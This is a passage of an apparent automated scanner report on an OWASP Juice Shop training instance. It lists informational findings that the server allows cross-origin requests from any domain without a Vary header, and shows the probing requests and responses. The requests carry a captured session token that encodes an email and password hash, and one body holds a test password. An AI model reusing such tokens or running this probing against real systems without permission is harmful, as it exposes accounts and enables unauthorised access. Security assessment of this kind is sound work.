Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://lcjziiknfnqx.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 483
ETag: W/"1e3-mC3tm9U3/CQVlyF/P8fgvQ"
Date: Sun, 15 Jan 2017 21:16:08 GMT
Connection: close

{"status":"success","data":{"id":8,"name":"OWASP SSL Advanced Forensic Tool (O-Saft)","description":"O-Saft is an easy to use tool to show information about SSL certificate and tests the SSL connectio
...[SNIP]...
2.13. http://192.168.61.143:3000/api/Users/
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /api/Users/

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://dppedruidqfy.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

POST /api/Users/ HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Referer: http://192.168.61.143:3000/
Content-Length: 108
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Origin: http://dppedruidqfy.com

{"email":"mike_landeck@hotmail.com","password":"juice-shop-password","passwordRepeat":"juice-shop-password"}

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 289
ETag: W/"121-6s6k4aYh+TR/lQiUc0Ps0Q"
Date: Sun, 15 Jan 2017 21:14:48 GMT
Connection: close

{"status":"error","message":{"errno":19,"code":"SQLITE_CONSTRAINT","sql":"INSERT INTO `Users` (`id`,`email`,`password`,`createdAt`,`updatedAt`) VALUES (NULL,'mike_landeck@hotmail.com','a992b1b403cba28
...[SNIP]...
2.14. http://192.168.61.143:3000/bower_components/angular-animate/angular-animate.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-animate/angular-animate.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://kedavwctmmwc.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-animate/angular-animate.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://kedavwctmmwc.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 16 Dec 2016 10:47:07 GMT
ETag: W/"647a-159073e17f8"
Content-Type: application/javascript
Content-Length: 25722
Date: Sun, 15 Jan 2017 21:11:12 GMT
Connection: close

/*
AngularJS v1.5.10
(c) 2010-2016 Google, Inc. http://angularjs.org
License: MIT
*/
(function(R,B){'use strict';function Da(a,b,c){if(!a)throw Ma("areq",b||"?",c||"required");return a}function Ea(
...[SNIP]...
2.15. http://192.168.61.143:3000/bower_components/angular-base64/angular-base64.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-base64/angular-base64.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://daapxpgeobvu.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-base64/angular-base64.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://daapxpgeobvu.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Mon, 18 May 2015 10:39:05 GMT
ETag: W/"16d4-14d669b0528"
Content-Type: application/javascript
Content-Length: 5844
Date: Sun, 15 Jan 2017 21:11:22 GMT
Connection: close

(function() {
'use strict';

/*
* Encapsulation of Nick Galbreath's base64.js library for AngularJS
* Original notice included below
*/

/*
* Copyright (c) 2010 Nick Ga
...[SNIP]...
2.16. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://zhxywfhqbbbq.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://zhxywfhqbbbq.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sat, 24 Sep 2016 04:17:49 GMT
ETag: W/"1e014-1575a69d9c8"
Content-Type: application/javascript
Content-Length: 122900
Date: Sun, 15 Jan 2017 21:11:40 GMT
Connection: close

/*
* angular-ui-bootstrap
* http://angular-ui.github.io/bootstrap/

* Version: 2.1.4 - 2016-09-23
* License: MIT
*/angular.module("ui.bootstrap",["ui.bootstrap.tpls","ui.bootstrap.collapse","ui.b
...[SNIP]...
2.17. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-bootstrap/ui-bootstrap.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://zjepdssncmll.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-bootstrap/ui-bootstrap.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://zjepdssncmll.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sat, 24 Sep 2016 04:17:49 GMT
ETag: W/"189dd-1575a69d9c8"
Content-Type: application/javascript
Content-Length: 100829
Date: Sun, 15 Jan 2017 21:11:39 GMT
Connection: close

/*
* angular-ui-bootstrap
* http://angular-ui.github.io/bootstrap/

* Version: 2.1.4 - 2016-09-23
* License: MIT
*/angular.module("ui.bootstrap",["ui.bootstrap.collapse","ui.bootstrap.tabindex","
...[SNIP]...
2.18. http://192.168.61.143:3000/bower_components/angular-cookies/angular-cookies.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-cookies/angular-cookies.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://oufruiwdpxxt.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-cookies/angular-cookies.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://oufruiwdpxxt.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 16 Dec 2016 10:47:07 GMT
ETag: W/"5a8-159073e17f8"
Content-Type: application/javascript
Content-Length: 1448
Date: Sun, 15 Jan 2017 21:11:34 GMT
Connection: close

/*
AngularJS v1.5.10
(c) 2010-2016 Google, Inc. http://angularjs.org
License: MIT
*/
(function(n,c){'use strict';function l(b,a,g){var d=g.baseHref(),k=b[0];return function(b,e,f){var g,h;f=f||{};h
...[SNIP]...
2.19. http://192.168.61.143:3000/bower_components/angular-qrcode/angular-qrcode.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-qrcode/angular-qrcode.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://lfhjeeaqigrl.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-qrcode/angular-qrcode.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://lfhjeeaqigrl.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Sat, 02 Apr 2016 10:19:01 GMT
ETag: W/"1493-153d67ba608"
Content-Type: application/javascript
Content-Length: 5267
Date: Sun, 15 Jan 2017 21:11:46 GMT
Connection: close

/*
* angular-qrcode v6.2.1
* (c) 2013 Monospaced http://monospaced.com
* License: MIT
*/

angular.module('monospaced.qrcode', [])
.directive('qrcode', ['$window', function($window) {

var ca
...[SNIP]...
2.20. http://192.168.61.143:3000/bower_components/angular-route/angular-route.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-route/angular-route.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://sovxvfcdthbn.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-route/angular-route.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://sovxvfcdthbn.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 16 Dec 2016 10:47:08 GMT
ETag: W/"12b2-159073e1be0"
Content-Type: application/javascript
Content-Length: 4786
Date: Sun, 15 Jan 2017 21:11:54 GMT
Connection: close

/*
AngularJS v1.5.10
(c) 2010-2016 Google, Inc. http://angularjs.org
License: MIT
*/
(function(E,d){'use strict';function y(t,l,g){return{restrict:"ECA",terminal:!0,priority:400,transclude:"element
...[SNIP]...
2.21. http://192.168.61.143:3000/bower_components/angular-socket-io/socket.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-socket-io/socket.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://psgsbfcnxgrn.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-socket-io/socket.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://psgsbfcnxgrn.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Mon, 08 Dec 2014 04:04:30 GMT
ETag: W/"50b-14a2811e8b0"
Content-Type: application/javascript
Content-Length: 1291
Date: Sun, 15 Jan 2017 21:11:54 GMT
Connection: close

/*
* @license
* angular-socket-io v0.7.0
* (c) 2014 Brian Ford http://briantford.com
* License: MIT
*/
angular.module("btford.socket-io",[]).provider("socketFactory",function(){"use strict";var n
...[SNIP]...
2.22. http://192.168.61.143:3000/bower_components/angular-touch/angular-touch.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-touch/angular-touch.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://elhlyphrfkav.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-touch/angular-touch.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://elhlyphrfkav.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Fri, 16 Dec 2016 10:47:08 GMT
ETag: W/"fca-159073e1be0"
Content-Type: application/javascript
Content-Length: 4042
Date: Sun, 15 Jan 2017 21:11:59 GMT
Connection: close

/*
AngularJS v1.5.10
(c) 2010-2016 Google, Inc. http://angularjs.org
License: MIT
*/
(function(x,n){'use strict';function s(f,k){var e=!1,a=!1;this.ngClickOverrideEnabled=function(b){return n.isDef
...[SNIP]...
2.23. http://192.168.61.143:3000/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://mqemvymanhbp.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
DNT: 1
Connection: close
Cache-Control: max-age=0
Origin: http://mqemvymanhbp.com

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 06 Dec 2016 18:57:00 GMT
ETag: W/"55b-158d57f0060"
Content-Type: application/javascript
Content-Length: 1371
Date: Sun, 15 Jan 2017 21:12:07 GMT
Connection: close

/*!
* angular-translate - v2.13.1 - 2016-12-06
*
* Copyright (c) 2016 The angular-translate team, Pascal Precht; Licensed MIT
*/
!function(a,b){"function"==typeof define&&define.amd?define([],fun
...[SNIP]...
2.24. http://192.168.61.143:3000/bower_components/angular-translate/angular-translate.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /bower_components/angular-translate/angular-translate.min.js

Issue detail

